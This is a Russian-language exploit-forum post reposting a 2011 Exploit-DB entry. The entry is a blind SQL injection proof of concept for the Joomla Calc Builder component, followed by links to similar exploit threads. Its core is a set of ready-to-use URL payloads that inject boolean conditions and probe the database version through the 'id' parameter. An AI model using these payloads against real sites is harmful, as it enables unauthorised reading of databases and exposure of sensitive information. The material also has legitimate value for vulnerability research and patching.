Exploit Joomla! Component com_calcbuilder - 'id' Blind SQL Injection

Exploiter

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
17414
Проверка EDB
  1. Пройдено
Автор
CHIP D3 BI0S
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2011-06-19
Код: 
---------------------------------------------------------------------------------
Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability
---------------------------------------------------------------------------------
 
Author          : Chip D3 Bi0s
Group           : LatinHackTeam
Email & msn     : chipdebios[alt+64]gmail.com
Date            : 19 June 2011
Critical Lvl    : Moderate
Impact          : Exposure of sensitive information
Where           : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application     : Calc Builder
version         : 0.0.1
Developer       : Guillermo Santiago
License         : GPLv2 or later       type  : Commercial
Date Added      : 12 June 2011
Price           : 9.90 €
Demo            : http://components.moonsoft.es/democalcbuilder 
Download        : http://components.moonsoft.es/downloadcalcbuilder
 
Description     :
 
CALC BUILDER allows you to create dynamic calculators.
Define your own input user form (types, size, order,validations).
Build results table through PHP code.
Export result table to PDF.
Simple and easy configuration. Three examples included.
 
 
---------------------------------------------------------------------------
 
 
I.Blind SQL injection (id) Poc/Exploit:
~~~~~~~~~
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 [blind]&fld_5=C

example
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=1&fld_5=C
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=2&fld_5=C

.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=4&fld_5=C
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=5&fld_5=C

 
 

A special greeting to my good friends:
R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita :)
 
 
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
Ответы
0
Просмотры
328
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component AcySMS 3.5.0 - CSV Macro Injection
Ответы
0
Просмотры
318
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
Ответы
0
Просмотры
338
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection
Ответы
0
Просмотры
326
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Ответы
0
Просмотры
334
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection
Ответы
0
Просмотры
319
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component NeoRecruit 4.1 - SQL Injection
Ответы
0
Просмотры
326
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Ответы
0
Просмотры
326
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Ответы
0
Просмотры
321
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Ответы
0
Просмотры
305
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу